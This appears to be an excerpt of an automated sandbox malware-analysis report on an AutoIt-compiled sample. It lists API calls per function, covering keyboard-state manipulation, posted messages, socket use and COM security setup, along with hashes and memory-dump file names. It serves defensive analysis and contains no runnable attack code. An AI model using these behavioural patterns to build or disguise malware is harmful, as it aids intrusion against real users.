        • Instruction ID: 85c3fdcefc4e8ac0025cf282fef562a6e506d9c24b5b414cf282eb967d3e366f
        • Opcode Fuzzy Hash: c9eaacec733ffca64cd2c339f12f58a4d14f5543427422c38d9f6ee2549249d5
        • Instruction Fuzzy Hash: 5C11EB327BA307BAE7096B5CDC83DBA679CDF16354B30402AF900A62C2EBF45D605664
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
        • String ID: 0.0.0.0
        • API String ID: 642191829-3771769585
        • Opcode ID: 853861f24d1bcf1d87e34c10efdffc6b380ef73f708c41fef67663268003c856
        • Instruction ID: aeb0837b29b4753e6f870946a96ff3d08726c3f2543f4317add12bd41c2944c3
        • Opcode Fuzzy Hash: 853861f24d1bcf1d87e34c10efdffc6b380ef73f708c41fef67663268003c856
        • Instruction Fuzzy Hash: 29110A71924209AFDB287B70DC4AEEE776CDF11710F11016DF509A60D2EF708A918F50
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$LocalTime
        • String ID:
        • API String ID: 952045576-0
        • Opcode ID: dbe2c7aeb96ded87fd69696121147d720963d5365ec852184f53614626019d65
        • Instruction ID: 8f55bc5cd06000cf7617435795f3f9cba943a762632b7f177e818c1f7fda3d32
        • Opcode Fuzzy Hash: dbe2c7aeb96ded87fd69696121147d720963d5365ec852184f53614626019d65
        • Instruction Fuzzy Hash: EA418365D20218B9DB11FBF4888AACFB7ACAF45710F508462E914E3163FB34D275C7A5
        APIs
        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 001FF953
        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0023F3D1
        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0023F454
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ShowWindow
        • String ID:
        • API String ID: 1268545403-0
        • Opcode ID: 3a833c3d1c06bab3d88b259db95d27a513cd187fe1a68ab2cc2f5312d1ecc844
        • Instruction ID: 3cfef033c9ce3f93cf7c1a18841e678bb550f48fb2aa5bbc82f9840e0c3637ed
        • Opcode Fuzzy Hash: 3a833c3d1c06bab3d88b259db95d27a513cd187fe1a68ab2cc2f5312d1ecc844
        • Instruction Fuzzy Hash: D8414A71614688BAC7789F39A98C73A7B91BF56318F54403CF34B52560C7F2A8D2CB10
        APIs
        • DeleteObject.GDI32(00000000), ref: 00272D1B
        • GetDC.USER32(00000000), ref: 00272D23
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00272D2E
        • ReleaseDC.USER32(00000000,00000000), ref: 00272D3A
        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00272D76
        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00272D87
        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00275A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00272DC2
        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00272DE1
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
        • String ID:
        • API String ID: 3864802216-0
        • Opcode ID: 62a43963e331b9c5c56fee24062f88a57913e78c0ace797f2707030f2259538e
        • Instruction ID: e690f8b19eb9d69ec3d8eedba8cb5c39baa7a57b188020a61d36d20d909f1e43
        • Opcode Fuzzy Hash: 62a43963e331b9c5c56fee24062f88a57913e78c0ace797f2707030f2259538e
        • Instruction Fuzzy Hash: 80319C72211214BFEB258F60DC8AFEB3BADEF49711F144059FE0C9A291C6759C90CBA0
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _memcmp
        • String ID:
        • API String ID: 2931989736-0
        • Opcode ID: 437caedf65f45cef0b67fadf265a5e1445d946c6dc1ed684c79f3bd9aa33cdfe
        • Instruction ID: 50b0887f3ba80f429f8a8581c051d9a6a258700d280dad55f3a265d03b2b7ef0
        • Opcode Fuzzy Hash: 437caedf65f45cef0b67fadf265a5e1445d946c6dc1ed684c79f3bd9aa33cdfe
        • Instruction Fuzzy Hash: 1021F561674A2A77D31D9A208F82FBA334CAE22784F454035FD489A687F770ED3189A5
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: NULL Pointer assignment$Not an Object type
        • API String ID: 0-572801152
        • Opcode ID: 61b24195301231d4dd4427347e7e58f4440fc077ae9f8feb8a29abd3f7ccf72f
        • Instruction ID: f76df16a1a8c3fbd88c0795d13c376575b9f87d629269acbb858d2ddf35da799
        • Opcode Fuzzy Hash: 61b24195301231d4dd4427347e7e58f4440fc077ae9f8feb8a29abd3f7ccf72f
        • Instruction Fuzzy Hash: 97D1D571A1061AAFDF10CFA8C891FAEB7B5FF48344F148069E915AB281E770DDA5CB50
        APIs
        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002217FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002215CE
        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00221651
        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002217FB,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002216E4
        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002216FB
          • Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,?,?,001FFDF5,?,?,00250832,0000FFFF), ref: 00213852
        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002217FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00221777
        • __freea.LIBCMT ref: 002217A2
        • __freea.LIBCMT ref: 002217AE
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
        • String ID:
        • API String ID: 2829977744-0
        • Opcode ID: c41b900befd41e07418062332aa3c022b370596e64b995784c640368e1cca4fc
        • Instruction ID: e7fbfce5b77e4366f7187f831aa81a4daf129431522ea796f8fae5c1aa909dfd
        • Opcode Fuzzy Hash: c41b900befd41e07418062332aa3c022b370596e64b995784c640368e1cca4fc
        • Instruction Fuzzy Hash: BA91A571E202267ADB208EF4E841EEEBBB59FA9310F580569E805E7181D725CD70CBA0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$ClearInit
        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
        • API String ID: 2610073882-625585964
        • Opcode ID: 668164285d51cb8a3af1d2a3f81c7e8593082b7977791793b9c5aa358c686d80
        • Instruction ID: 30272711517092beff976ae884172cd4dba02d75a932bbb1a323f511c582afc5
        • Opcode Fuzzy Hash: 668164285d51cb8a3af1d2a3f81c7e8593082b7977791793b9c5aa358c686d80
        • Instruction Fuzzy Hash: F491C371A20219AFDF20DFA4CC84FAEB7B8EF46714F108559F545AB280D7709995CFA0
        APIs
        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0025125C
        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00251284
        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002512A8
        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002512D8
        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0025135F
        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002513C4
        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00251430
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ArraySafe$Data$Access$UnaccessVartype
        • String ID:
        • API String ID: 2550207440-0
        • Opcode ID: 6e1938d845949ad3bccc8e70a94786609102a542a107c9ebdb8ad5f208c37769
        • Instruction ID: 388aa0a498f2ea1b27b1f70ec567dd59b26eb7300335603ffcca68aa68e88252
        • Opcode Fuzzy Hash: 6e1938d845949ad3bccc8e70a94786609102a542a107c9ebdb8ad5f208c37769
        • Instruction Fuzzy Hash: 04910371A20219AFEB00DFA4D895BBE77B5FF44316F104029ED00E7291D7B4A969CF98
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ObjectSelect$BeginCreatePath
        • String ID:
        • API String ID: 3225163088-0
        • Opcode ID: 78dc20941552df9b207a24e458f92d55d1d413fcdab2222e8ea69920466e1e43
        • Instruction ID: 6b626bd718b68014c806628ba898ee1155047e74d4cca41d216c7e0e310b8c47
        • Opcode Fuzzy Hash: 78dc20941552df9b207a24e458f92d55d1d413fcdab2222e8ea69920466e1e43
        • Instruction Fuzzy Hash: 0F913AB1D00219EFCB14DFA9CC88AEEBBB8FF49320F14455AE615B7261D375A941CB60
        APIs
        • VariantInit.OLEAUT32(?), ref: 0026396B
        • CharUpperBuffW.USER32(?,?), ref: 00263A7A
        • _wcslen.LIBCMT ref: 00263A8A
        • VariantClear.OLEAUT32(?), ref: 00263C1F
          • Part of subcall function 00250CDF: VariantInit.OLEAUT32(00000000), ref: 00250D1F
          • Part of subcall function 00250CDF: VariantCopy.OLEAUT32(?,?), ref: 00250D28
          • Part of subcall function 00250CDF: VariantClear.OLEAUT32(?), ref: 00250D34
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
        • String ID: AUTOIT.ERROR$Incorrect Parameter format
        • API String ID: 4137639002-1221869570
        • Opcode ID: b6e5e720c3a1499273534f4ae052e63dfd14589e404229e68fb204ebd6ef0a95
        • Instruction ID: c6e20a080f82a6bb7dc4449e14cd23b5413913e5bb95db7b4871a4997f7621aa
        • Opcode Fuzzy Hash: b6e5e720c3a1499273534f4ae052e63dfd14589e404229e68fb204ebd6ef0a95
        • Instruction Fuzzy Hash: 589144746287459FC704EF64C48196AB7E4FF89314F14882EF88A9B351DB30EE95CB92
        APIs
          • Part of subcall function 0024000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?,?,0024035E), ref: 0024002B
          • Part of subcall function 0024000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240046
          • Part of subcall function 0024000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240054
          • Part of subcall function 0024000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?), ref: 00240064
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00264C51
        • _wcslen.LIBCMT ref: 00264D59
        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00264DCF
        • CoTaskMemFree.OLE32(?), ref: 00264DDA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
        • String ID: NULL Pointer assignment
        • API String ID: 614568839-2785691316
        • Opcode ID: 4ab2abaf1b4b61e70bf189f39e9857b5883efcc125218d57aca3ac5bc3258c18
        • Instruction ID: fb3044032cfbe85f06204f5cfd97db33e80b025e7cec6ca8c67f44cd26dc98ac
        • Opcode Fuzzy Hash: 4ab2abaf1b4b61e70bf189f39e9857b5883efcc125218d57aca3ac5bc3258c18
        • Instruction Fuzzy Hash: B1913771D1021DAFDF14EFA4D881EEEB7B8BF08304F50816AE955A7251DB309A94CF60
        APIs
        • GetMenu.USER32(?), ref: 00272183
        • GetMenuItemCount.USER32(00000000), ref: 002721B5
        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002721DD
        • _wcslen.LIBCMT ref: 00272213
        • GetMenuItemID.USER32(?,?), ref: 0027224D
        • GetSubMenu.USER32(?,?), ref: 0027225B
          • Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
          • Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
          • Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65
        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002722E3
          • Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
        • String ID:
        • API String ID: 4196846111-0
        • Opcode ID: d95f3847b8033f2dfe15466e20c13987e183af6d524bbf07eeb00559e144fff4
        • Instruction ID: d4cec0b4d60caf9f5a6588fb3599c231ec339d9bca2ac07e0762c6469ecab2b3
        • Opcode Fuzzy Hash: d95f3847b8033f2dfe15466e20c13987e183af6d524bbf07eeb00559e144fff4
        • Instruction Fuzzy Hash: DF718D75A10205EFCB10DF69C885AAEB7F5FF48310F148499E81AEB342DB74EE558B90
        APIs
        • GetParent.USER32(?), ref: 0024AEF9
        • GetKeyboardState.USER32(?), ref: 0024AF0E
        • SetKeyboardState.USER32(?), ref: 0024AF6F
        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0024AF9D
        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0024AFBC
        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0024AFFD
        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0024B020
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessagePost$KeyboardState$Parent
        • String ID:
        • API String ID: 87235514-0
        • Opcode ID: 4fd1eece3ba6e26f914cbc28f686ed1c755fcf4455a61c41ec767022f61556eb
        • Instruction ID: 8c72ede99a3711460848573fbb1da50a4c03d1d7d5d54b4dc299645ee95d58b2
        • Opcode Fuzzy Hash: 4fd1eece3ba6e26f914cbc28f686ed1c755fcf4455a61c41ec767022f61556eb
        • Instruction Fuzzy Hash: 8951D4A0A647D63DFB3B86348C45BBB7EE95B06304F088489E1D9498C2C3D9EDE8D751
        APIs
        • GetParent.USER32(00000000), ref: 0024AD19
        • GetKeyboardState.USER32(?), ref: 0024AD2E
        • SetKeyboardState.USER32(?), ref: 0024AD8F
        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0024ADBB
        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0024ADD8
        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0024AE17
        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0024AE38
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessagePost$KeyboardState$Parent
        • String ID:
        • API String ID: 87235514-0
        • Opcode ID: 13b3a295c2fa0c9c17551b5ca26b7536787ccf83124720e1767ee6a98e65fc21
        • Instruction ID: bdfc5b0092fec81045aecd28d9aca49a15bdbef5c97004eb9a56d54d65835bb7
        • Opcode Fuzzy Hash: 13b3a295c2fa0c9c17551b5ca26b7536787ccf83124720e1767ee6a98e65fc21
        • Instruction Fuzzy Hash: EE51F9A1AA87D67DFB3F87348C85B7A7E985F45300F088498E1E54A8C3C294ECA4D752
        APIs
        • GetConsoleCP.KERNEL32(00223CD6,?,?,?,?,?,?,?,?,00215BA3,?,?,00223CD6,?,?), ref: 00215470
        • __fassign.LIBCMT ref: 002154EB
        • __fassign.LIBCMT ref: 00215506
        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00223CD6,00000005,00000000,00000000), ref: 0021552C
        • WriteFile.KERNEL32(?,00223CD6,00000000,00215BA3,00000000,?,?,?,?,?,?,?,?,?,00215BA3,?), ref: 0021554B
        • WriteFile.KERNEL32(?,?,00000001,00215BA3,00000000,?,?,?,?,?,?,?,?,?,00215BA3,?), ref: 00215584
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID:
        • API String ID: 1324828854-0
        • Opcode ID: 01c2a91544710546312965cca041a7fe493c5cea1c3d271bbf5482090b3d83ea
        • Instruction ID: 1db92c435b47c0f23a9823f8ca2d5993efbc1903a8d8ea7a6ab3d088f0906e2a
        • Opcode Fuzzy Hash: 01c2a91544710546312965cca041a7fe493c5cea1c3d271bbf5482090b3d83ea
        • Instruction Fuzzy Hash: 8B510570A10609EFDB10CFA8D885BEEBBFAEF59300F14415AF555E3291D7309A91CB60
        APIs
          • Part of subcall function 0026304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
          • Part of subcall function 0026304E: _wcslen.LIBCMT ref: 0026309B
        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00261112
        • WSAGetLastError.WSOCK32 ref: 00261121
        • WSAGetLastError.WSOCK32 ref: 002611C9
        • closesocket.WSOCK32(00000000), ref: 002611F9
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
        • String ID:
        • API String ID: 2675159561-0
